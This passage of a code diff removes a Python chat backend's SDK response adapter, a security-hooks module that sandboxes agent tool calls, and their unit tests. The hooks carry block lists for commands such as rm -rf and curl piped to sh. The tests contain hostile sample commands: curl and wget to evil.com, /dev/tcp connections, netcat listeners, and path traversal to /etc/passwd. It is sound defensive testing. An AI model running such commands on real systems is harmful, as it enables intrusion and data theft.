if content and isinstance(content, list) and len(content) > 0:
first_item = content[0]
output = first_item.get("text", "") if isinstance(first_item, dict) else ""
else:
output = ""
is_error = result.get("isError", False)
return output, is_error
except Exception as e:
return f"Error: {str(e)}", True

View File

@@ -1,212 +0,0 @@
"""Response adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This module provides the adapter layer that converts streaming messages from
the Claude Agent SDK into the Vercel AI SDK UI Stream Protocol format that
the frontend expects.
"""
import json
import logging
import uuid
from claude_agent_sdk import (
AssistantMessage,
Message,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
StreamUsage,
)
from backend.api.features.chat.sdk.tool_adapter import (
MCP_TOOL_PREFIX,
pop_pending_tool_output,
)
logger = logging.getLogger(__name__)
class SDKResponseAdapter:
"""Adapter for converting Claude Agent SDK messages to Vercel AI SDK format.
This class maintains state during a streaming session to properly track
text blocks, tool calls, and message lifecycle.
"""
def __init__(self, message_id: str | None = None):
self.message_id = message_id or str(uuid.uuid4())
self.text_block_id = str(uuid.uuid4())
self.has_started_text = False
self.has_ended_text = False
self.current_tool_calls: dict[str, dict[str, str]] = {}
self.task_id: str | None = None
self.step_open = False
def set_task_id(self, task_id: str) -> None:
"""Set the task ID for reconnection support."""
self.task_id = task_id
def convert_message(self, sdk_message: Message) -> list[StreamBaseResponse]:
"""Convert a single SDK message to Vercel AI SDK format."""
responses: list[StreamBaseResponse] = []
if isinstance(sdk_message, SystemMessage):
if sdk_message.subtype == "init":
responses.append(
StreamStart(messageId=self.message_id, taskId=self.task_id)
)
# Open the first step (matches non-SDK: StreamStart then StreamStartStep)
responses.append(StreamStartStep())
self.step_open = True
elif isinstance(sdk_message, AssistantMessage):
# After tool results, the SDK sends a new AssistantMessage for the
# next LLM turn. Open a new step if the previous one was closed.
if not self.step_open:
responses.append(StreamStartStep())
self.step_open = True
for block in sdk_message.content:
if isinstance(block, TextBlock):
if block.text:
self._ensure_text_started(responses)
responses.append(
StreamTextDelta(id=self.text_block_id, delta=block.text)
)
elif isinstance(block, ToolUseBlock):
self._end_text_if_open(responses)
# Strip MCP prefix so frontend sees "find_block"
# instead of "mcp__copilot__find_block".
tool_name = block.name.removeprefix(MCP_TOOL_PREFIX)
responses.append(
StreamToolInputStart(toolCallId=block.id, toolName=tool_name)
)
responses.append(
StreamToolInputAvailable(
toolCallId=block.id,
toolName=tool_name,
input=block.input,
)
)
self.current_tool_calls[block.id] = {"name": tool_name}
elif isinstance(sdk_message, UserMessage):
# UserMessage carries tool results back from tool execution.
content = sdk_message.content
blocks = content if isinstance(content, list) else []
for block in blocks:
if isinstance(block, ToolResultBlock) and block.tool_use_id:
tool_info = self.current_tool_calls.get(block.tool_use_id, {})
tool_name = tool_info.get("name", "unknown")
# Prefer the stashed full output over the SDK's
# (potentially truncated) ToolResultBlock content.
# The SDK truncates large results, writing them to disk,
# which breaks frontend widget parsing.
output = pop_pending_tool_output(tool_name) or (
_extract_tool_output(block.content)
)
responses.append(
StreamToolOutputAvailable(
toolCallId=block.tool_use_id,
toolName=tool_name,
output=output,
success=not (block.is_error or False),
)
)
# Close the current step after tool results — the next
# AssistantMessage will open a new step for the continuation.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
elif isinstance(sdk_message, ResultMessage):
self._end_text_if_open(responses)
# Close the step before finishing.
if self.step_open:
responses.append(StreamFinishStep())
self.step_open = False
# Emit token usage if the SDK reported it
usage = getattr(sdk_message, "usage", None) or {}
if usage:
input_tokens = usage.get("input_tokens", 0)
output_tokens = usage.get("output_tokens", 0)
responses.append(
StreamUsage(
promptTokens=input_tokens,
completionTokens=output_tokens,
totalTokens=input_tokens + output_tokens,
)
)
if sdk_message.subtype == "success":
responses.append(StreamFinish())
elif sdk_message.subtype in ("error", "error_during_execution"):
error_msg = getattr(sdk_message, "result", None) or "Unknown error"
responses.append(
StreamError(errorText=str(error_msg), code="sdk_error")
)
responses.append(StreamFinish())
else:
logger.debug(f"Unhandled SDK message type: {type(sdk_message).__name__}")
return responses
def _ensure_text_started(self, responses: list[StreamBaseResponse]) -> None:
"""Start (or restart) a text block if needed."""
if not self.has_started_text or self.has_ended_text:
if self.has_ended_text:
self.text_block_id = str(uuid.uuid4())
self.has_ended_text = False
responses.append(StreamTextStart(id=self.text_block_id))
self.has_started_text = True
def _end_text_if_open(self, responses: list[StreamBaseResponse]) -> None:
"""End the current text block if one is open."""
if self.has_started_text and not self.has_ended_text:
responses.append(StreamTextEnd(id=self.text_block_id))
self.has_ended_text = True
def _extract_tool_output(content: str | list[dict[str, str]] | None) -> str:
"""Extract a string output from a ToolResultBlock's content field."""
if isinstance(content, str):
return content
if isinstance(content, list):
parts = [item.get("text", "") for item in content if item.get("type") == "text"]
if parts:
return "".join(parts)
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)
if content is None:
return ""
try:
return json.dumps(content)
except (TypeError, ValueError):
return str(content)

View File

@@ -1,366 +0,0 @@
"""Unit tests for the SDK response adapter."""
from claude_agent_sdk import (
AssistantMessage,
ResultMessage,
SystemMessage,
TextBlock,
ToolResultBlock,
ToolUseBlock,
UserMessage,
)
from backend.api.features.chat.response_model import (
StreamBaseResponse,
StreamError,
StreamFinish,
StreamFinishStep,
StreamStart,
StreamStartStep,
StreamTextDelta,
StreamTextEnd,
StreamTextStart,
StreamToolInputAvailable,
StreamToolInputStart,
StreamToolOutputAvailable,
)
from .response_adapter import SDKResponseAdapter
from .tool_adapter import MCP_TOOL_PREFIX
def _adapter() -> SDKResponseAdapter:
a = SDKResponseAdapter(message_id="msg-1")
a.set_task_id("task-1")
return a
# -- SystemMessage -----------------------------------------------------------
def test_system_init_emits_start_and_step():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="init", data={}))
assert len(results) == 2
assert isinstance(results[0], StreamStart)
assert results[0].messageId == "msg-1"
assert results[0].taskId == "task-1"
assert isinstance(results[1], StreamStartStep)
def test_system_non_init_emits_nothing():
adapter = _adapter()
results = adapter.convert_message(SystemMessage(subtype="other", data={}))
assert results == []
# -- AssistantMessage with TextBlock -----------------------------------------
def test_text_block_emits_step_start_and_delta():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="hello")], model="test")
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "hello"
def test_empty_text_block_emits_only_step():
adapter = _adapter()
msg = AssistantMessage(content=[TextBlock(text="")], model="test")
results = adapter.convert_message(msg)
# Empty text skipped, but step still opens
assert len(results) == 1
assert isinstance(results[0], StreamStartStep)
def test_multiple_text_deltas_reuse_block_id():
adapter = _adapter()
msg1 = AssistantMessage(content=[TextBlock(text="a")], model="test")
msg2 = AssistantMessage(content=[TextBlock(text="b")], model="test")
r1 = adapter.convert_message(msg1)
r2 = adapter.convert_message(msg2)
# First gets step+start+delta, second only delta (block & step already started)
assert len(r1) == 3
assert isinstance(r1[0], StreamStartStep)
assert isinstance(r1[1], StreamTextStart)
assert len(r2) == 1
assert isinstance(r2[0], StreamTextDelta)
assert r1[1].id == r2[0].id # same block ID
# -- AssistantMessage with ToolUseBlock --------------------------------------
def test_tool_use_emits_input_start_and_available():
"""Tool names arrive with MCP prefix and should be stripped for the frontend."""
adapter = _adapter()
msg = AssistantMessage(
content=[
ToolUseBlock(
id="tool-1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"q": "x"},
)
],
model="test",
)
results = adapter.convert_message(msg)
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamToolInputStart)
assert results[1].toolCallId == "tool-1"
assert results[1].toolName == "find_agent" # prefix stripped
assert isinstance(results[2], StreamToolInputAvailable)
assert results[2].toolName == "find_agent" # prefix stripped
assert results[2].input == {"q": "x"}
def test_text_then_tool_ends_text_block():
adapter = _adapter()
text_msg = AssistantMessage(content=[TextBlock(text="thinking...")], model="test")
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
adapter.convert_message(text_msg) # opens step + text
results = adapter.convert_message(tool_msg)
# Step already open, so: TextEnd, ToolInputStart, ToolInputAvailable
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamToolInputStart)
# -- UserMessage with ToolResultBlock ----------------------------------------
def test_tool_result_emits_output_and_finish_step():
adapter = _adapter()
# First register the tool call (opens step) — SDK sends prefixed name
tool_msg = AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}find_agent", input={})],
model="test",
)
adapter.convert_message(tool_msg)
# Now send tool result
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="found 3 agents")]
)
results = adapter.convert_message(result_msg)
assert len(results) == 2
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].toolCallId == "t1"
assert results[0].toolName == "find_agent" # prefix stripped
assert results[0].output == "found 3 agents"
assert results[0].success is True
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_error():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}run_agent", input={})
],
model="test",
)
)
result_msg = UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="timeout", is_error=True)]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].success is False
assert isinstance(results[1], StreamFinishStep)
def test_tool_result_list_content():
adapter = _adapter()
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
result_msg = UserMessage(
content=[
ToolResultBlock(
tool_use_id="t1",
content=[
{"type": "text", "text": "line1"},
{"type": "text", "text": "line2"},
],
)
]
)
results = adapter.convert_message(result_msg)
assert isinstance(results[0], StreamToolOutputAvailable)
assert results[0].output == "line1line2"
assert isinstance(results[1], StreamFinishStep)
def test_string_user_message_ignored():
"""A plain string UserMessage (not tool results) produces no output."""
adapter = _adapter()
results = adapter.convert_message(UserMessage(content="hello"))
assert results == []
# -- ResultMessage -----------------------------------------------------------
def test_result_success_emits_finish_step_and_finish():
adapter = _adapter()
# Start some text first (opens step)
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="done")], model="test")
)
msg = ResultMessage(
subtype="success",
duration_ms=100,
duration_api_ms=50,
is_error=False,
num_turns=1,
session_id="s1",
)
results = adapter.convert_message(msg)
# TextEnd + FinishStep + StreamFinish
assert len(results) == 3
assert isinstance(results[0], StreamTextEnd)
assert isinstance(results[1], StreamFinishStep)
assert isinstance(results[2], StreamFinish)
def test_result_error_emits_error_and_finish():
adapter = _adapter()
msg = ResultMessage(
subtype="error",
duration_ms=100,
duration_api_ms=50,
is_error=True,
num_turns=0,
session_id="s1",
result="API rate limited",
)
results = adapter.convert_message(msg)
# No step was open, so no FinishStep — just Error + Finish
assert len(results) == 2
assert isinstance(results[0], StreamError)
assert "API rate limited" in results[0].errorText
assert isinstance(results[1], StreamFinish)
# -- Text after tools (new block ID) ----------------------------------------
def test_text_after_tool_gets_new_block_id():
adapter = _adapter()
# Text -> Tool -> ToolResult -> Text should get a new text block ID and step
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="before")], model="test")
)
adapter.convert_message(
AssistantMessage(
content=[ToolUseBlock(id="t1", name=f"{MCP_TOOL_PREFIX}tool", input={})],
model="test",
)
)
# Send tool result (closes step)
adapter.convert_message(
UserMessage(content=[ToolResultBlock(tool_use_id="t1", content="ok")])
)
results = adapter.convert_message(
AssistantMessage(content=[TextBlock(text="after")], model="test")
)
# Should get StreamStartStep (new step) + StreamTextStart (new block) + StreamTextDelta
assert len(results) == 3
assert isinstance(results[0], StreamStartStep)
assert isinstance(results[1], StreamTextStart)
assert isinstance(results[2], StreamTextDelta)
assert results[2].delta == "after"
# -- Full conversation flow --------------------------------------------------
def test_full_conversation_flow():
"""Simulate a complete conversation: init -> text -> tool -> result -> text -> finish."""
adapter = _adapter()
all_responses: list[StreamBaseResponse] = []
# 1. Init
all_responses.extend(
adapter.convert_message(SystemMessage(subtype="init", data={}))
)
# 2. Assistant text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="Let me search")], model="test")
)
)
# 3. Tool use
all_responses.extend(
adapter.convert_message(
AssistantMessage(
content=[
ToolUseBlock(
id="t1",
name=f"{MCP_TOOL_PREFIX}find_agent",
input={"query": "email"},
)
],
model="test",
)
)
)
# 4. Tool result
all_responses.extend(
adapter.convert_message(
UserMessage(
content=[ToolResultBlock(tool_use_id="t1", content="Found 2 agents")]
)
)
)
# 5. More text
all_responses.extend(
adapter.convert_message(
AssistantMessage(content=[TextBlock(text="I found 2")], model="test")
)
)
# 6. Result
all_responses.extend(
adapter.convert_message(
ResultMessage(
subtype="success",
duration_ms=500,
duration_api_ms=400,
is_error=False,
num_turns=2,
session_id="s1",
)
)
)
types = [type(r).__name__ for r in all_responses]
assert types == [
"StreamStart",
"StreamStartStep", # step 1: text + tool call
"StreamTextStart",
"StreamTextDelta", # "Let me search"
"StreamTextEnd", # closed before tool
"StreamToolInputStart",
"StreamToolInputAvailable",
"StreamToolOutputAvailable", # tool result
"StreamFinishStep", # step 1 closed after tool result
"StreamStartStep", # step 2: continuation text
"StreamTextStart", # new block after tool
"StreamTextDelta", # "I found 2"
"StreamTextEnd", # closed by result
"StreamFinishStep", # step 2 closed
"StreamFinish",
]

View File

@@ -1,393 +0,0 @@
"""Security hooks for Claude Agent SDK integration.
This module provides security hooks that validate tool calls before execution,
ensuring multi-user isolation and preventing unauthorized operations.
"""
import json
import logging
import os
import re
import shlex
from typing import Any, cast
from backend.api.features.chat.sdk.tool_adapter import MCP_TOOL_PREFIX
logger = logging.getLogger(__name__)
# Tools that are blocked entirely (CLI/system access)
BLOCKED_TOOLS = {
"bash",
"shell",
"exec",
"terminal",
"command",
}
# Safe read-only commands allowed in the sandboxed Bash tool.
# These are data-processing / inspection utilities — no writes, no network.
ALLOWED_BASH_COMMANDS = {
# JSON / structured data
"jq",
# Text processing
"grep",
"egrep",
"fgrep",
"rg",
"head",
"tail",
"cat",
"wc",
"sort",
"uniq",
"cut",
"tr",
"sed",
"awk",
"column",
"fold",
"fmt",
"nl",
"paste",
"rev",
# File inspection (read-only)
"find",
"ls",
"file",
"stat",
"du",
"tree",
"basename",
"dirname",
"realpath",
# Utilities
"echo",
"printf",
"date",
"true",
"false",
"xargs",
"tee",
# Comparison / encoding
"diff",
"comm",
"base64",
"md5sum",
"sha256sum",
}
# Tools allowed only when their path argument stays within the SDK workspace.
# The SDK uses these to handle oversized tool results (writes to tool-results/
# files, then reads them back) and for workspace file operations.
WORKSPACE_SCOPED_TOOLS = {"Read", "Write", "Edit", "Glob", "Grep"}
# Tools that get sandboxed Bash validation (command allowlist + workspace paths).
SANDBOXED_BASH_TOOLS = {"Bash"}
# Dangerous patterns in tool inputs
DANGEROUS_PATTERNS = [
r"sudo",
r"rm\s+-rf",
r"dd\s+if=",
r"/etc/passwd",
r"/etc/shadow",
r"chmod\s+777",
r"curl\s+.*\|.*sh",
r"wget\s+.*\|.*sh",
r"eval\s*\(",
r"exec\s*\(",
r"__import__",
r"os\.system",
r"subprocess",
]
def _deny(reason: str) -> dict[str, Any]:
"""Return a hook denial response."""
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": reason,
}
}
def _validate_workspace_path(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate that a workspace-scoped tool only accesses allowed paths.
Allowed directories:
- The SDK working directory (``/tmp/copilot-<session>/``)
- The SDK tool-results directory (``~/.claude/projects/…/tool-results/``)
"""
path = tool_input.get("file_path") or tool_input.get("path") or ""
if not path:
# Glob/Grep without a path default to cwd which is already sandboxed
return {}
resolved = os.path.normpath(os.path.expanduser(path))
# Allow access within the SDK working directory
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
return {}
# Allow access to ~/.claude/projects/*/tool-results/ (big tool results)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
return {}
logger.warning(
f"Blocked {tool_name} outside workspace: {path} (resolved={resolved})"
)
return _deny(
f"Tool '{tool_name}' can only access files within the workspace directory."
)
def _validate_bash_command(
tool_input: dict[str, Any], sdk_cwd: str | None
) -> dict[str, Any]:
"""Validate a Bash command against the allowlist of safe commands.
Only read-only data-processing commands are allowed (jq, grep, head, etc.).
Blocks command substitution, output redirection, and disallowed executables.
Uses ``shlex.split`` to properly handle quoted strings (e.g. jq filters
containing ``|`` won't be mistaken for shell pipes).
"""
command = tool_input.get("command", "")
if not command or not isinstance(command, str):
return _deny("Bash command is empty.")
# Block command substitution — can smuggle arbitrary commands
if "$(" in command or "`" in command:
return _deny("Command substitution ($() or ``) is not allowed in Bash.")
# Block output redirection — Bash should be read-only
if re.search(r"(?<!\d)>{1,2}\s", command):
return _deny("Output redirection (> or >>) is not allowed in Bash.")
# Block /dev/ access (e.g., /dev/tcp for network)
if "/dev/" in command:
return _deny("Access to /dev/ is not allowed in Bash.")
# Tokenize with shlex (respects quotes), then extract command names.
# shlex preserves shell operators like | ; && || as separate tokens.
try:
tokens = shlex.split(command)
except ValueError:
return _deny("Malformed command (unmatched quotes).")
# Walk tokens: the first non-assignment token after a pipe/separator is a command.
expect_command = True
for token in tokens:
if token in ("|", "||", "&&", ";"):
expect_command = True
continue
if expect_command:
# Skip env var assignments (VAR=value)
if "=" in token and not token.startswith("-"):
continue
cmd_name = os.path.basename(token)
if cmd_name not in ALLOWED_BASH_COMMANDS:
allowed = ", ".join(sorted(ALLOWED_BASH_COMMANDS))
logger.warning(f"Blocked Bash command: {cmd_name}")
return _deny(
f"Command '{cmd_name}' is not allowed. "
f"Allowed commands: {allowed}"
)
expect_command = False
# Validate absolute file paths stay within workspace
if sdk_cwd:
norm_cwd = os.path.normpath(sdk_cwd)
claude_dir = os.path.normpath(os.path.expanduser("~/.claude/projects"))
for token in tokens:
if not token.startswith("/"):
continue
resolved = os.path.normpath(token)
if resolved.startswith(norm_cwd + os.sep) or resolved == norm_cwd:
continue
if resolved.startswith(claude_dir + os.sep) and "tool-results" in resolved:
continue
logger.warning(f"Blocked Bash path outside workspace: {token}")
return _deny(
f"Bash can only access files within the workspace directory. "
f"Path '{token}' is outside the workspace."
)
return {}
def _validate_tool_access(
tool_name: str, tool_input: dict[str, Any], sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Validate that a tool call is allowed.
Returns:
Empty dict to allow, or dict with hookSpecificOutput to deny
"""
# Block forbidden tools
if tool_name in BLOCKED_TOOLS:
logger.warning(f"Blocked tool access attempt: {tool_name}")
return _deny(
f"Tool '{tool_name}' is not available. "
"Use the CoPilot-specific tools instead."
)
# Sandboxed Bash: only allowlisted commands, workspace-scoped paths
if tool_name in SANDBOXED_BASH_TOOLS:
return _validate_bash_command(tool_input, sdk_cwd)
# Workspace-scoped tools: allowed only within the SDK workspace directory
if tool_name in WORKSPACE_SCOPED_TOOLS:
return _validate_workspace_path(tool_name, tool_input, sdk_cwd)
# Check for dangerous patterns in tool input
# Use json.dumps for predictable format (str() produces Python repr)
input_str = json.dumps(tool_input) if tool_input else ""
for pattern in DANGEROUS_PATTERNS:
if re.search(pattern, input_str, re.IGNORECASE):
logger.warning(
f"Blocked dangerous pattern in tool input: {pattern} in {tool_name}"
)
return _deny("Input contains blocked pattern")
return {}
def _validate_user_isolation(
tool_name: str, tool_input: dict[str, Any], user_id: str | None
) -> dict[str, Any]:
"""Validate that tool calls respect user isolation."""
# For workspace file tools, ensure path doesn't escape
if "workspace" in tool_name.lower():
path = tool_input.get("path", "") or tool_input.get("file_path", "")
if path:
# Check for path traversal
if ".." in path or path.startswith("/"):
logger.warning(
f"Blocked path traversal attempt: {path} by user {user_id}"
)
return {
"hookSpecificOutput": {
"hookEventName": "PreToolUse",
"permissionDecision": "deny",
"permissionDecisionReason": "Path traversal not allowed",
}
}
return {}
def create_security_hooks(
user_id: str | None, sdk_cwd: str | None = None
) -> dict[str, Any]:
"""Create the security hooks configuration for Claude Agent SDK.
Includes security validation and observability hooks:
- PreToolUse: Security validation before tool execution
- PostToolUse: Log successful tool executions
- PostToolUseFailure: Log and handle failed tool executions
- PreCompact: Log context compaction events (SDK handles compaction automatically)
Args:
user_id: Current user ID for isolation validation
sdk_cwd: SDK working directory for workspace-scoped tool validation
Returns:
Hooks configuration dict for ClaudeAgentOptions
"""
try:
from claude_agent_sdk import HookMatcher
from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
async def pre_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Combined pre-tool-use validation hook."""
_ = context # unused but required by signature
tool_name = cast(str, input_data.get("tool_name", ""))
tool_input = cast(dict[str, Any], input_data.get("tool_input", {}))
# Strip MCP prefix for consistent validation
is_copilot_tool = tool_name.startswith(MCP_TOOL_PREFIX)
clean_name = tool_name.removeprefix(MCP_TOOL_PREFIX)
# Only block non-CoPilot tools; our MCP-registered tools
# (including Read for oversized results) are already sandboxed.
if not is_copilot_tool:
result = _validate_tool_access(clean_name, tool_input, sdk_cwd)
if result:
return cast(SyncHookJSONOutput, result)
# Validate user isolation
result = _validate_user_isolation(clean_name, tool_input, user_id)
if result:
return cast(SyncHookJSONOutput, result)
logger.debug(f"[SDK] Tool start: {tool_name}, user={user_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_use_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log successful tool executions for observability."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
logger.debug(f"[SDK] Tool success: {tool_name}, tool_use_id={tool_use_id}")
return cast(SyncHookJSONOutput, {})
async def post_tool_failure_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log failed tool executions for debugging."""
_ = context
tool_name = cast(str, input_data.get("tool_name", ""))
error = input_data.get("error", "Unknown error")
logger.warning(
f"[SDK] Tool failed: {tool_name}, error={error}, "
f"user={user_id}, tool_use_id={tool_use_id}"
)
return cast(SyncHookJSONOutput, {})
async def pre_compact_hook(
input_data: HookInput,
tool_use_id: str | None,
context: HookContext,
) -> SyncHookJSONOutput:
"""Log when SDK triggers context compaction.
The SDK automatically compacts conversation history when it grows too large.
This hook provides visibility into when compaction happens.
"""
_ = context, tool_use_id
trigger = input_data.get("trigger", "auto")
logger.info(
f"[SDK] Context compaction triggered: {trigger}, user={user_id}"
)
return cast(SyncHookJSONOutput, {})
return {
"PreToolUse": [HookMatcher(matcher="*", hooks=[pre_tool_use_hook])],
"PostToolUse": [HookMatcher(matcher="*", hooks=[post_tool_use_hook])],
"PostToolUseFailure": [
HookMatcher(matcher="*", hooks=[post_tool_failure_hook])
],
"PreCompact": [HookMatcher(matcher="*", hooks=[pre_compact_hook])],
}
except ImportError:
# Fallback for when SDK isn't available - return empty hooks
logger.warning("claude-agent-sdk not available, security hooks disabled")
return {}

View File

@@ -1,258 +0,0 @@
"""Unit tests for SDK security hooks."""
import os
from .security_hooks import _validate_tool_access, _validate_user_isolation
SDK_CWD = "/tmp/copilot-abc123"
def _is_denied(result: dict) -> bool:
hook = result.get("hookSpecificOutput", {})
return hook.get("permissionDecision") == "deny"
# -- Blocked tools -----------------------------------------------------------
def test_blocked_tools_denied():
for tool in ("bash", "shell", "exec", "terminal", "command"):
result = _validate_tool_access(tool, {})
assert _is_denied(result), f"{tool} should be blocked"
def test_unknown_tool_allowed():
result = _validate_tool_access("SomeCustomTool", {})
assert result == {}
# -- Workspace-scoped tools --------------------------------------------------
def test_read_within_workspace_allowed():
result = _validate_tool_access(
"Read", {"file_path": f"{SDK_CWD}/file.txt"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_write_within_workspace_allowed():
result = _validate_tool_access(
"Write", {"file_path": f"{SDK_CWD}/output.json"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_edit_within_workspace_allowed():
result = _validate_tool_access(
"Edit", {"file_path": f"{SDK_CWD}/src/main.py"}, sdk_cwd=SDK_CWD
)
assert result == {}
def test_glob_within_workspace_allowed():
result = _validate_tool_access("Glob", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_grep_within_workspace_allowed():
result = _validate_tool_access("Grep", {"path": f"{SDK_CWD}/src"}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_outside_workspace_denied():
result = _validate_tool_access(
"Read", {"file_path": "/etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_write_outside_workspace_denied():
result = _validate_tool_access(
"Write", {"file_path": "/home/user/secrets.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_traversal_attack_denied():
result = _validate_tool_access(
"Read",
{"file_path": f"{SDK_CWD}/../../etc/passwd"},
sdk_cwd=SDK_CWD,
)
assert _is_denied(result)
def test_no_path_allowed():
"""Glob/Grep without a path argument defaults to cwd — should pass."""
result = _validate_tool_access("Glob", {}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_no_cwd_denies_absolute():
"""If no sdk_cwd is set, absolute paths are denied."""
result = _validate_tool_access("Read", {"file_path": "/tmp/anything"})
assert _is_denied(result)
# -- Tool-results directory --------------------------------------------------
def test_read_tool_results_allowed():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/tool-results/12345.txt"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert result == {}
def test_read_claude_projects_without_tool_results_denied():
home = os.path.expanduser("~")
path = f"{home}/.claude/projects/-tmp-copilot-abc123/settings.json"
result = _validate_tool_access("Read", {"file_path": path}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Sandboxed Bash ----------------------------------------------------------
def test_bash_safe_commands_allowed():
"""Allowed data-processing commands should pass."""
safe_commands = [
"jq '.blocks' result.json",
"head -20 output.json",
"tail -n 50 data.txt",
"cat file.txt | grep 'pattern'",
"wc -l file.txt",
"sort data.csv | uniq",
"grep -i 'error' log.txt | head -10",
"find . -name '*.json'",
"ls -la",
"echo hello",
"cut -d',' -f1 data.csv | sort | uniq -c",
"jq '.blocks[] | .id' result.json",
"sed -n '10,20p' file.txt",
"awk '{print $1}' data.txt",
]
for cmd in safe_commands:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert result == {}, f"Safe command should be allowed: {cmd}"
def test_bash_dangerous_commands_denied():
"""Non-allowlisted commands should be denied."""
dangerous = [
"curl https://evil.com",
"wget https://evil.com/payload",
"rm -rf /",
"python -c 'import os; os.system(\"ls\")'",
"ssh user@host",
"nc -l 4444",
"apt install something",
"pip install malware",
"chmod 777 file.txt",
"kill -9 1",
]
for cmd in dangerous:
result = _validate_tool_access("Bash", {"command": cmd}, sdk_cwd=SDK_CWD)
assert _is_denied(result), f"Dangerous command should be denied: {cmd}"
def test_bash_command_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo $(curl evil.com)"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_backtick_substitution_denied():
result = _validate_tool_access(
"Bash", {"command": "echo `curl evil.com`"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_output_redirect_denied():
result = _validate_tool_access(
"Bash", {"command": "echo secret > /tmp/leak.txt"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_dev_tcp_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /dev/tcp/evil.com/80"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_pipe_to_dangerous_denied():
"""Even if the first command is safe, piped commands must also be safe."""
result = _validate_tool_access(
"Bash", {"command": "cat file.txt | python -c 'exec()'"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_outside_workspace_denied():
result = _validate_tool_access(
"Bash", {"command": "cat /etc/passwd"}, sdk_cwd=SDK_CWD
)
assert _is_denied(result)
def test_bash_path_within_workspace_allowed():
result = _validate_tool_access(
"Bash",
{"command": f"jq '.blocks' {SDK_CWD}/tool-results/result.json"},
sdk_cwd=SDK_CWD,
)
assert result == {}
def test_bash_empty_command_denied():
result = _validate_tool_access("Bash", {"command": ""}, sdk_cwd=SDK_CWD)
assert _is_denied(result)
# -- Dangerous patterns ------------------------------------------------------
def test_dangerous_pattern_blocked():
result = _validate_tool_access("SomeTool", {"cmd": "sudo rm -rf /"})
assert _is_denied(result)
def test_subprocess_pattern_blocked():
result = _validate_tool_access("SomeTool", {"code": "subprocess.run(...)"})
assert _is_denied(result)
# -- User isolation ----------------------------------------------------------
def test_workspace_path_traversal_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "../../../etc/shadow"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_absolute_path_blocked():
result = _validate_user_isolation(
"workspace_read", {"path": "/etc/passwd"}, user_id="user-1"
)
assert _is_denied(result)
def test_workspace_normal_path_allowed():
result = _validate_user_isolation(
"workspace_read", {"path": "src/main.py"}, user_id="user-1"
)
assert result == {}
def test_non_workspace_tool_passes_isolation():
